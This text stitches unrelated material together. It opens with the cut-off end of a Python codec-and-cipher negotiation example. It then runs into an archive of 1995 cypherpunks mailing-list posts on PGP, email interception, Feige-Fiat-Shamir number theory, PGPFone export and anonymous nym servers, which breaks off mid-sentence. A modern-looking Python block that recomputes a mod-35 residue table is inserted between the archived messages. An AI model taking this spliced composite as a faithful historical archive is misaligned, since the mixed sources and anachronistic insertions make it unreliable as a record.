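             if c.mips + k.mips <= budget]
    if not pairs:
        # Assumption of this example: fail closed instead of dropping encryption.
        raise NegotiationError("no common codec and cipher fit this link")
    # Assumption of this example: cipher strength outranks speech quality.
    codec, cipher = max(pairs, key=lambda p: (p[1].strength, p[0].quality))
    return codec.name, cipher.name, ui_mode(layer)


# Constructed catalogue. CodecA and CodecB follow the message; BaseCodec is the
# "base level" fallback that runs on any layer.
CODEC_A = Codec("CodecA", SynchronousLayer, 16000, mips=12, quality=8)
CODEC_B = Codec("CodecB", AsynchronousLayer, 8000, mips=10, quality=6)
BASE = Codec("BaseCodec", TransmissionLayer, 4800, mips=4, quality=2)
DES = Cipher("DES", mips=3, strength=1)
TRIPLE_DES = Cipher("3DES", mips=9, strength=2)

ALICE = Endpoint(25, frozenset({CODEC_A, CODEC_B, BASE}), frozenset({DES, TRIPLE_DES}))
BOB = Endpoint(16, frozenset({CODEC_A, BASE}), frozenset({DES, TRIPLE_DES}))
CAROL = Endpoint(40, frozenset({CODEC_A, CODEC_B, BASE}), frozenset({DES, TRIPLE_DES}))
DAVE = Endpoint(40, frozenset({CODEC_A, BASE}), frozenset())  # offers no cipher

if __name__ == "__main__":
    print(negotiate(SynchronousLayer(28800), ALICE, CAROL))
    print(negotiate(SynchronousLayer(28800, full_duplex=False), ALICE, BOB))
    print(negotiate(AsynchronousLayer(64000, multiparty=True), ALICE, CAROL))
```

[With ALICE and BOB the shared 16 MIPS budget cannot carry CodecA and
3DES together, so the call drops to BaseCodec rather than to the weaker
cipher.]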





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 13 Aug 95 06:17:29 PDT
To: cypherpunks@toad.com
Subject: EYE_see
Message-ID: <199508131317.JAA15824@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-13-95. NYPaper:


   "One Source, Many Ideas In Foster Case: Publisher Bankrolls
   Cover Up Theories."

      The theory of a Vincent Foster murder and a cover-up has
      been promoted by a handful of foundations and
      publications united by a common denominator: the money
      of Richard Mellon Scaife.

      "The death of Vincent Foster: I think that's the Rosetta
      Stone to the whole Clinton Administration," said Mr.
      Scaife, a newspaper publisher with half a billion
      dollars in the bank, during a two-hour interview.


   EYE_see (about 5K)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 13 Aug 95 12:00:44 PDT
To: cypherpunks@toad.com
Subject: Why does the feed always get hosed on a weekend?
Message-ID: <199508131858.OAA23027@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It seems that every time majordomo goes down is on a weekend. Why is that?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMC5K9yoZzwIn1bdtAQH3igF+OiLvo0hfV8cGyATot6QF82UZVVc8JMTm
yfoD6JSv0bUondWXt/4kVk/cUzEWFOz7
=/FnW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 13 Aug 95 13:34:14 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Who Else is Reading your Email? (From Cu Digest, #7.67)
Message-ID: <Pine.ULT.3.91.950813152944.3887A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Normally, I don't like reposting things to this list.  However, I am 
going to report this from the most recent version of CuD, because I think 
it hits a very important nail right on the head.  Not just that PGP is 
going, but it puts all of the terms we on this list have been bantering 
around for the last couple of years into ones that laymen can understand.

I sincerely think that this is the kind of push we need to make as a 
whole to bring about social change on the net (and social change is what 
is needed).  Ie, PGP is good because 1) it keeps people from reading your 
email (like an envelope) and 2) it makes sure nobody forges your messages 
by allowing you to digitally sign them.

Anyways, sorry for the report, please flame lightly :-)

- ---------------------------------------------------------------------

Date: Wed, 09 Aug 1995 19:25:49 -0400
From: kkc@INTERLOG.COM(K.K. Campbell)
Subject: File 1--Who Else is Reading your Email?

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eye WEEKLY                                                June 29 1995
Toronto's arts newspaper                      .....free every Thursday
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eye.NET                                                        eye.NET

                    WHO ELSE IS READING YOUR EMAIL?
                   Part 1 of a 2-part series on PGP

                                 by
                            K.K. CAMPBELL

I recently conducted an overseas interview with a "computer security
person at a highly sensitive facility." Mr. Security explained that the
potential misuse of the computer resources of this site was a serious
concern, a danger to thousands. This instilled in him a peppery dash of
paranoia about who was using what machine for what purpose.

In discussing this, the name of a certain, rather net.famous individual
arose. I was surprised to learn this individual was well-known in
international security circles. This individual is considered a "risk."
I was informed that this person's email is "monitored."

To spell it out: people were reading and collecting all the email the
"risk" wrote. Without the target's knowledge. Without any form of
warrant.

Most netters think such intrusion involves someone "hacking a
password." Wrong. When you hit the "send" command for email, your
missive seems to (poof!) magically appear in the recipient's mailbox.
Person to person. The ultimate intimacy. Wrong again. Email is actually
passed through a number of computers. The operator of one of those
machines can effortlessly read your email. Any one who "breaks into"
such a machine can inspect your mail. Once in, they can tamper with
files so that all your email is copied to another location, without you
being aware of it.

But not everyone wants to "break into" a computer. In the above case,
email was copied "in transit." When email is transferred from machine
to machine, it is made readable. So if you intercept a copy (through
"sniffers"), you can read it. Everything this individual had written
over the last couple of years has apparently been intercepted and read.
His file is huge.

With Canada news media in a tizzy about "regulating the net," how long
before CSIS requests funds to start collecting posts with buzzwords in
the network data flow?

                POSTCARDS

It should be the first lesson every newbie learns: email ain't secure.
An email is like a postcard: it travels through the many sets of hands
in delivery and any set of hands can read it if so inclined. Most
postal employees don't, for two reasons: there is so much mail they
haven't the time, and most postcards are so boring, who the hell wants
to?

The same goes with the system administrators who oversee the shunting
around of all your cyberscribbling. Most don't snoop, but some do. Need
I remind you that, er, sysadmins are not a monolithically
mature-and-well-adjusted breed imbued with highly developed moral
principles...

What can you, the lowly downtrodden, rights-less end-user, do? You have
three strategies:

 -- no precautions: who cares if anyone reads what you write/receive;
 -- minimal coding, easy to crack, but enough to stop casual snoops --
  kind of like "virtual envelopes"; and
 -- PGP.

PGP stands for Pretty Good Privacy -- a humble title to be sure,
considering that the U.S. government/military wants to ban the thing.
And why? Because PGP has the power to thwart their zillion-dollar spy
efforts by imbuing everyday folk with the cryptographic might of the
best "puzzle palaces" around the world.

The elegantly powerful encryption device is the offspring of Colorado
resident Phil Zimmermann (prz@acm.org). He basically took all the (very
public) papers on cryptography, stirred it together and voilà: instant
"threat to democracy" -- if you buy the government/military propaganda.
(More on Zimmermann and the cryptographic spook backlash next issue
[below].)

What PGP does is solve that decades old spy/cryptography dilemma: How
can one send secure messages to absolute strangers over an insecure
medium?

PGP exploits two historical developments:

 -- home computers gave commoners the computational power to use the
  sophisticated cryptography algorithms; and
 -- the advent of public key encryption in the late '70s bade
  farewell to Ilya Kuryakin and Napoleon Solo.

Computers were originally designed (back in World War II) to be
sophisticated code breakers. Today, government/military bureaucracy
(especially in the U.S.) still operate with that attitude: computer
cryptography is a military weapon.

In those Cold War days, the only way to send secure messages over
insecure channels (telegraphs, phones, mail, etc.) was to first
deliver a "cryptographic key" via secure channels. The key was
something like a little code book; the secure delivery channel was
usually a dour-faced courier with a black bag handcuffed to his wrist.
"Deliver this or die doing so, 007..."

          BE AN INTERNATIONAL ARMS DEALER!

Governments and mega-corps could afford to send satchel-toting couriers
overseas, but us proles had little hope of doing that. So citizens were
always vulnerable to mail-opening, phone-tapping spooks.

PGP uses two keys -- a public key and a secret key. Anyone can use your
public key to encrypt a message to you, and only you can then decrypt
it with your secret key. As long as your secret key remains secret, no
one can read that message -- not even the person who encrypted. The
idea is to spread your public key around in Key Exchanges, like phone
books.

For details on this complex subject, try _PGP: Pretty Good Privacy_ by
Simson Garfinkel (O'Reilly & Assoc., http://www.ora.com, $29.95 paper).
Or _The Computer Privacy Handbook_ (Peachpit Press,
http://www.peachpit.com/peachpit, $31.95 paper). Both go beyond
technical details and delve into the sociopolitical issues around
privacy.

Where can you get PGP? All around the world. PGP is freeware -- you can
use it endlessly without cost. But remember: The U.S. State Department
export restrictions classify cryptographic materials to be munitions.
Exporting it from the U.S. is a serious matter. For those uninterested
in becoming international arms smugglers, do an Archie search for "PGP"
or try Toronto's Interlog at ftp://ftp.interlog.com/pub/pgp . Read
newsgroups alt.security.pgp and sci.crypt for discussions.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMC5FqjokqlyVGmCFAQEIogQAqMhbVQnCI9ElX0rVYQO/7cuY+YWqLQhh
9bZOsis9Tfp2ko9KJ9Dpek8wHo/I3ODCPbY3flxwE/q6ogU1DJvJXYzWtc7fmbOH
QI2038hRnnt8bsMei/WQEunuo5iGCAzrTuOG/PkfkB2GsM4/5b6jaHlWCCSIdGoz
JzyXt0dMJoE=
=kR1W
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sun, 13 Aug 95 06:37:42 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <v01510101ac52bb169eb8@[193.74.217.18]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Anonymous says ....

>will someone just CUT THE @#$%^&* FOSTER CONSPIRACY THEORIES??
>I'm getting F---ING SICK AND TIRED of all the BULL**** that

and says....

>any good drill instructer. oh yes, so many of you pansies
>need to get into a serious digital BOOT camp. learn some real

and says...

>"mind masturbating and drug fondling" parties every few
>days with all the Hoi Poilloi Holier-Than-Thou pricks of
>the world, the "cum of the net" ejaculating all over each
>other, hehehehehehe what a bunch of effeminate nobodies...

and says...

>the most scurrilous swine for taking up PARRY's time with
>your filling up this mailing list with GARBAGE? TRASH?
>EXCREMENT? ODIOUS EFFLUVIA??? don't you know that it cuts

and says...

>UNIX SOFTWARE AND HOW TO WRITE A CORRECT DNS LOOKUP VIA
>SOCKET LIBRARIES. are we cypherpunks, or cypherprogrammers?
>GET A CLUE, PEOPLE.

and says...

>I'M GOING TO MAILBOMB THE WHOLE LIST. that'll teach the
>@#$^%^&* bastards to mess with MY VALUABLE TIME.

I say:

Anonymous, you could learn to relax a little.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMC0LjI4k1+54BopBAQGGBwQAgovXJ5zJKFWs8h/hdwOW91MT22BBZwCf
jo9WRwzuM2x6C2cDPM5ti5V0CNEG5RY64jXbd6By4At5ALN1Y671Mb2Eh51c9K6R
EjG0Ihm1um0Knv50fsta0UqcH5r9YHl1AZAVAe2f7xPPYBA6M/0f5S7KUGhfcOgX
yqX8pM5pKOI=
=efaH
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 13 Aug 95 14:27:43 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Who Else is Reading your Email? (From Cu Digest, #7.67)
Message-ID: <Pine.ULT.3.91.950813162604.4794B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm resending this message because I think it's important and because the 
list went down again but appears to be back up now.  :-)

========================================================================

Normally, I don't like reposting things to this list.  However, I am 
going to report this from the most recent version of CuD, because I think 
it hits a very important nail right on the head.  Not just that PGP is 
going, but it puts all of the terms we on this list have been bantering 
around for the last couple of years into ones that laymen can understand.

I sincerely think that this is the kind of push we need to make as a 
whole to bring about social change on the net (and social change is what 
is needed).  Ie, PGP is good because 1) it keeps people from reading your 
email (like an envelope) and 2) it makes sure nobody forges your messages 
by allowing you to digitally sign them.

Anyways, sorry for the report, please flame lightly :-)

- ---------------------------------------------------------------------

Date: Wed, 09 Aug 1995 19:25:49 -0400
From: kkc@INTERLOG.COM(K.K. Campbell)
Subject: File 1--Who Else is Reading your Email?

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eye WEEKLY                                                June 29 1995
Toronto's arts newspaper                      .....free every Thursday
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eye.NET                                                        eye.NET

                    WHO ELSE IS READING YOUR EMAIL?
                   Part 1 of a 2-part series on PGP

                                 by
                            K.K. CAMPBELL

I recently conducted an overseas interview with a "computer security
person at a highly sensitive facility." Mr. Security explained that the
potential misuse of the computer resources of this site was a serious
concern, a danger to thousands. This instilled in him a peppery dash of
paranoia about who was using what machine for what purpose.

In discussing this, the name of a certain, rather net.famous individual
arose. I was surprised to learn this individual was well-known in
international security circles. This individual is considered a "risk."
I was informed that this person's email is "monitored."

To spell it out: people were reading and collecting all the email the
"risk" wrote. Without the target's knowledge. Without any form of
warrant.

Most netters think such intrusion involves someone "hacking a
password." Wrong. When you hit the "send" command for email, your
missive seems to (poof!) magically appear in the recipient's mailbox.
Person to person. The ultimate intimacy. Wrong again. Email is actually
passed through a number of computers. The operator of one of those
machines can effortlessly read your email. Any one who "breaks into"
such a machine can inspect your mail. Once in, they can tamper with
files so that all your email is copied to another location, without you
being aware of it.

But not everyone wants to "break into" a computer. In the above case,
email was copied "in transit." When email is transferred from machine
to machine, it is made readable. So if you intercept a copy (through
"sniffers"), you can read it. Everything this individual had written
over the last couple of years has apparently been intercepted and read.
His file is huge.

With Canada news media in a tizzy about "regulating the net," how long
before CSIS requests funds to start collecting posts with buzzwords in
the network data flow?

                POSTCARDS

It should be the first lesson every newbie learns: email ain't secure.
An email is like a postcard: it travels through the many sets of hands
in delivery and any set of hands can read it if so inclined. Most
postal employees don't, for two reasons: there is so much mail they
haven't the time, and most postcards are so boring, who the hell wants
to?

The same goes with the system administrators who oversee the shunting
around of all your cyberscribbling. Most don't snoop, but some do. Need
I remind you that, er, sysadmins are not a monolithically
mature-and-well-adjusted breed imbued with highly developed moral
principles...

What can you, the lowly downtrodden, rights-less end-user, do? You have
three strategies:

 -- no precautions: who cares if anyone reads what you write/receive;
 -- minimal coding, easy to crack, but enough to stop casual snoops --
  kind of like "virtual envelopes"; and
 -- PGP.

PGP stands for Pretty Good Privacy -- a humble title to be sure,
considering that the U.S. government/military wants to ban the thing.
And why? Because PGP has the power to thwart their zillion-dollar spy
efforts by imbuing everyday folk with the cryptographic might of the
best "puzzle palaces" around the world.

The elegantly powerful encryption device is the offspring of Colorado
resident Phil Zimmermann (prz@acm.org). He basically took all the (very
public) papers on cryptography, stirred it together and voilà: instant
"threat to democracy" -- if you buy the government/military propaganda.
(More on Zimmermann and the cryptographic spook backlash next issue
[below].)

What PGP does is solve that decades old spy/cryptography dilemma: How
can one send secure messages to absolute strangers over an insecure
medium?

PGP exploits two historical developments:

 -- home computers gave commoners the computational power to use the
  sophisticated cryptography algorithms; and
 -- the advent of public key encryption in the late '70s bade
  farewell to Ilya Kuryakin and Napoleon Solo.

Computers were originally designed (back in World War II) to be
sophisticated code breakers. Today, government/military bureaucracy
(especially in the U.S.) still operate with that attitude: computer
cryptography is a military weapon.

In those Cold War days, the only way to send secure messages over
insecure channels (telegraphs, phones, mail, etc.) was to first
deliver a "cryptographic key" via secure channels. The key was
something like a little code book; the secure delivery channel was
usually a dour-faced courier with a black bag handcuffed to his wrist.
"Deliver this or die doing so, 007..."

          BE AN INTERNATIONAL ARMS DEALER!

Governments and mega-corps could afford to send satchel-toting couriers
overseas, but us proles had little hope of doing that. So citizens were
always vulnerable to mail-opening, phone-tapping spooks.

PGP uses two keys -- a public key and a secret key. Anyone can use your
public key to encrypt a message to you, and only you can then decrypt
it with your secret key. As long as your secret key remains secret, no
one can read that message -- not even the person who encrypted. The
idea is to spread your public key around in Key Exchanges, like phone
books.

For details on this complex subject, try _PGP: Pretty Good Privacy_ by
Simson Garfinkel (O'Reilly & Assoc., http://www.ora.com, $29.95 paper).
Or _The Computer Privacy Handbook_ (Peachpit Press,
http://www.peachpit.com/peachpit, $31.95 paper). Both go beyond
technical details and delve into the sociopolitical issues around
privacy.

Where can you get PGP? All around the world. PGP is freeware -- you can
use it endlessly without cost. But remember: The U.S. State Department
export restrictions classify cryptographic materials to be munitions.
Exporting it from the U.S. is a serious matter. For those uninterested
in becoming international arms smugglers, do an Archie search for "PGP"
or try Toronto's Interlog at ftp://ftp.interlog.com/pub/pgp . Read
newsgroups alt.security.pgp and sci.crypt for discussions.

 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ihtfp.org>
Date: Sun, 13 Aug 95 17:48:10 PDT
To: Ben <adept@minerva.cis.yale.edu>
Subject: Re: Q's on Number Theory/Quadriatic Residues
In-Reply-To: <199508132330.AA08361@minerva.cis.yale.edu>
Message-ID: <199508140047.RAA26889@ihtfp.org>
MIME-Version: 1.0
Content-Type: text/plain


>                  -1             -1
>         v       v         sqrt(v  )
>          16      11           ***9
>          29      29           ***8
> 
> ***How are these square roots?  9 is certainly not the square root of
> 11, nor is 8 the square root of 29, even modulo 35.

Bzzt!  Try Again.  If you use bc, you will notice that 9^2 mod 35 == 11
and 8^2 mod 35 == 29...  You should go take your number theory class!

> 81%35
> 11
> 64%35
> 29

>         mean "the inverse of v."  Are these two expressions interchangeable
>         or is this something that I should have found in the errata?

Yes.  It is the multiplicative inverse.  This is very basic math.  Go
re-read your 7th-grade algebra book:
	v^(-1) == 1/v

Take your number theory class, and if you can't figure out after that,
re-ask the questions.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 13 Aug 95 16:02:25 PDT
To: cypherpunks@toad.com
Subject: EYE_see
Message-ID: <199508132302.TAA05634@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-13-95. NYPaper:


   "One Source, Many Ideas In Foster Case: Publisher Bankrolls
   Cover Up Theories."

      The theory of a Vincent Foster murder and a cover-up has
      been promoted by a handful of foundations and
      publications united by a common denominator: the money
      of Richard Mellon Scaife.

      "The death of Vincent Foster: I think that's the Rosetta
      Stone to the whole Clinton Administration," said Mr.
      Scaife, a newspaper publisher with half a billion
      dollars in the bank, during a two-hour interview.


   EYE_see (about 5K)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <adept@minerva.cis.yale.edu>
Date: Sun, 13 Aug 95 16:30:32 PDT
To: cypherpunks@toad.com
Subject: Q's on Number Theory/Quadriatic Residues
Message-ID: <199508132330.AA08361@minerva.cis.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've been trying to get myself up to speed on some of the protocols in
_Applied_Cryptography_ and my woeful lack of number theory is showing through
crystal clear.

While a course on number theory is in the works for the fall, right now, I'm
sort of curious and would appreciate any sort of response I can get to the
following questions from those of you to whom number theory is not as much of
a stranger.

1)In AC on page 293 in the section on the Feige-Fiat-Shamir, there is a
chart which lists the residues, their inverses and their square roots, all
modulo 35.  The chart, which I have reproduced below, baffles me--at least
the part for the square roots:

                 -1             -1
        v       v         sqrt(v  )
         1       1               1
         4       9               3
         9       4               2
         11      16              4
         16      11           ***9
         29      29           ***8


***How are these square roots?  9 is certainly not the square root of 11, nor is
8 the square root of 29, even modulo 35.  

2)By the same token, on the previous pages Schneier uses the expression
        (1/v), which I take to mean "the quantity one divided by the value 
                                                   -1
        of v", while the example expresses it as (v  ) which I take to 
        mean "the inverse of v."  Are these two expressions interchangeable
        or is this something that I should have found in the errata?

3)Speaking of errata, where can I find a copy?

4)Now, going back to the number theory, I've got a few more questions re:
quadratic residues.
        a)On page 293, the residues are listed as, "the possible quadratic
        residues"
        Is it possible to predict the possible quadratic residues, or is an
        exhaustive search of the values on the interval [1,n] necessary to
        find the quadratic residues of modulo n?


5)From what does Feige-Fiat-Shamir derive its security?  Obviously not
discrete logs, but I'm not sure I understand the protocol sufficiently to be
able to see where it derives its security.

To those of you who aren't interested, thanks for reading so far, and with
this we return you to your regularly scheduled conspiracy rants, personal
attacks, and other random nonsense.  To those of you who can respond, any
assistance is appreciated.

Ben.
***********************************************************************
Ben Samman					     Samman@cs.yale.edu
I'm on vacation now, so e-mail will receive a latency of +/- 24 hours.
		PGP Key available from keyservers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@cs.yale.edu>
Date: Sun, 13 Aug 95 18:19:52 PDT
To: Derek Atkins <warlord@ihtfp.org>
Subject: Re: Q's on Number Theory/Quadriatic Residues
Message-ID: <199508140119.AA14883@minerva.cis.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 05:47 PM 8/13/95 PDT, Derek Atkins wrote:
>>                  -1             -1
>>         v       v         sqrt(v  )
>>          16      11           ***9
>>          29      29           ***8
>> 
>> ***How are these square roots?  9 is certainly not the square root of
>> 11, nor is 8 the square root of 29, even modulo 35.
>
>Bzzt!  Try Again.  If you use bc, you will notice that 9^2 mod 35 == 11
>and 8^2 mod 35 == 29...  You should go take your number theory class!

Definitely. Is there an easy way to get from the 29 to the 8?  I can see how
it goes the other way, but what I didn't see was how, if given 29, I could
get the 8? (Euclid's?)

>
>>         mean "the inverse of v."  Are these two expressions interchangeable
>>         or is this something that I should have found in the errata?
>
>Yes.  It is the multiplicative inverse.  This is very basic math.  Go
>re-read your 7th-grade algebra book:
>	v^(-1) == 1/v

Ok.  I wasn't thinking of multiplicative inverse when doing this--I guess I
wasn't in the right frame of mind.

>Take your number theory class, and if you can't figure out after that,
>re-ask the questions.

I'll take the course, but you still needn't be so smarmy about it.

Ben.
***********************************************************************
Ben Samman					     Samman@cs.yale.edu
I'm on vacation now, so e-mail will receive a latency of +/- 24 hours.
		PGP Key available from keyservers
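
The mod-35 table discussed in this thread can be recomputed directly. The following is an added example, not part of any post above or of _Applied Cryptography_: it lists the quadratic residues mod 35, predicts them with Euler's criterion instead of a search over [1,n], inverts them with `pow(v, -1, n)` (extended Euclid), and gets from 29 to 8 by taking roots mod 5 and mod 7 and recombining them with the Chinese Remainder Theorem. All function names are illustrative, and the root step assumes the factors of n are known; without them, extracting square roots mod n is as hard as factoring n.

```python
"""Added example: recompute the mod-35 residue table quoted in the thread."""
from math import gcd


def quadratic_residues(n):
    """Squares of the residues coprime to n, found by exhaustive search."""
    return sorted({x * x % n for x in range(1, n) if gcd(x, n) == 1})


def is_residue(v, p, q):
    """Euler's criterion on each prime factor of n = p*q (v coprime to n).

    v is a square mod p*q exactly when it is a square mod p and mod q,
    so no search over [1, n] is needed once the factors are known.
    """
    return all(pow(v, (r - 1) // 2, r) == 1 for r in (p, q))


def sqrt_mod_prime(a, p):
    """All square roots of a modulo a small prime p (plain search)."""
    return [x for x in range(p) if x * x % p == a % p]


def crt_pair(rp, p, rq, q):
    """The unique x mod p*q with x = rp (mod p) and x = rq (mod q)."""
    return (rp * q * pow(q, -1, p) + rq * p * pow(p, -1, q)) % (p * q)


def sqrt_mod_pq(a, p, q):
    """All square roots of a mod p*q; an empty list if a is not a square."""
    return sorted({crt_pair(rp, p, rq, q)
                   for rp in sqrt_mod_prime(a, p)
                   for rq in sqrt_mod_prime(a, q)})


def residue_table(p, q):
    """Rows (v, v^-1, sqrt(v^-1)) mod p*q for every quadratic residue v.

    Each residue has four square roots mod p*q; taking the smallest one
    reproduces the column printed in the table quoted above.
    """
    n = p * q
    rows = []
    for v in quadratic_residues(n):
        v_inv = pow(v, -1, n)  # multiplicative inverse via extended Euclid
        rows.append((v, v_inv, min(sqrt_mod_pq(v_inv, p, q))))
    return rows


if __name__ == "__main__":
    for row in residue_table(5, 7):
        print("%4d %4d %4d" % row)
    print("roots of 29 mod 35:", sqrt_mod_pq(29, 5, 7))
```
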





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 13 Aug 95 18:23:16 PDT
To: cypherpunks@toad.com
Subject: Bet e$ on how long it will take for PGPFone to make it overseas!
Message-ID: <199508140120.VAA24979@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To loosen up the often so serious discussions on the list, I propose a
little game. PGPFone's release is about a week away. PRZ is trying his
hardest to keep it from being exported. Still, I have the feeling that
some irresponsible cyphercriminal will break US law and export PGPFone
anyway. Let us bet cyberbucks on how long it will take for this crime to
happen. Here is my initial offer:

I bet e$50 that PGPFone will have been exported 24 hours after its final
release has been announced to this list. Who is willing to take the bet?
Perhaps someone is willing to bet at less time?

Have fun,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMC6k0CoZzwIn1bdtAQExpwF+JN52E31iW2XIepF1eINcDLJIrxsyY+4Y
Dkc8HTBQdKZch6RAah+MT8/Q2ALSIwgO
=TpOg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 13 Aug 95 19:48:48 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: My pseudo-anonymous dream list
Message-ID: <Pine.ULT.3.91.950813213118.8694A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

There was some talk on Friday about "nym" servers similar in operation 
to anon.penet.fi.  I was meaning to provide some commentary on Friday, 
but it kinda got pushed back by a lazy weekend.

Anyways, I wanted to toss some non-technical things into the fray about 
what I'd like to see in a good "nym" server.  If you grow weary from my 
wish-rants, press 'd' now :-)

==============

Anon.penet.fi is arguably one of the most used anonymous servers on the 
Internet.  One of the chief reasons it is used so much by so many so 
often is because it is also the easiest to use.  Posting to a newsgroup 
or mailing to another person is handled without having to think about 
anything.  This is quite unlike most anonymous remailers which require 
quite a bit more work (for the lay person) for only one-way mailing.

Any future remailers (and for the purpose of this message, assume
"remailer" means a pseudo-anonymous remailing mechanism like penet.fi)
will need to maintain the ease of use that penet.fi has.  No messy headers
of embedded command lines.  Just send the message to an address and it's
taken care of. 

There are, however, a great number of internal improvements that could be 
made that would both improve user-end usefulness AND improve overall 
security.

1)  Multiple Remailers:
I'd like to see multiple (maybe >12) remailers that utilize the same
database, upgraded by batched processes once or twice a day or "broadcast"
realtime to all the remailers in the web (probably the latter is better). 
In this way, a person with a pseudo-ID of FOO, could be addressed as FOO
at ANY of the remailers.  The primary purpose of this is to allow easy
chaining (see below), but it might also serve to distribute much of the
load around the net.  Penet.fi is grossly overloaded, so a solution to
that needs to be found. 

2)  Encrypted Databases:
One of the failings of anon.penet.fi that has been exploited by 
various LEAs is the fact that the database of users is accessible by the 
operator.  Any properly designed 'nym' server should have a totally 
encrypted database.  Thus if your local LEA roams by demanding to know 
the name of the person associated with an ID, the best the operator can 
do is to give them a copy of the encrypted entry from the database (or, I 
suppose, the entire database :-)

3)  Limited ID lifetime
Another failing, IMHO, with penet.fi is that ID#'s have an unlimited 
lifetime.  I think any remailer should limit the lifetime of any ID to no 
longer than 12 months, with six months being the default, and 3 months 
being an option (plus, of course, a manual cancelation on the part of 
the user).  When an ID is expired, it is removed entirely from the 
database and NOT reissued again.

4)  Chained Mailings
Because you have many remailers operating, all messages should be randomly
chained through them.  Perhaps the default number of hops is three, with
the user-definable of 1 to 20.  This means that while I might send a
message to alt.sex.abuse.recovery@anon.mit.edu, it might end up being
posted from anon.berkeley.edu after passing through anon.umn.edu and
anon.toad.com.  It makes traffic analysis that much more difficult. 
Before a chaining is done, the remailer should ping the target remailer to
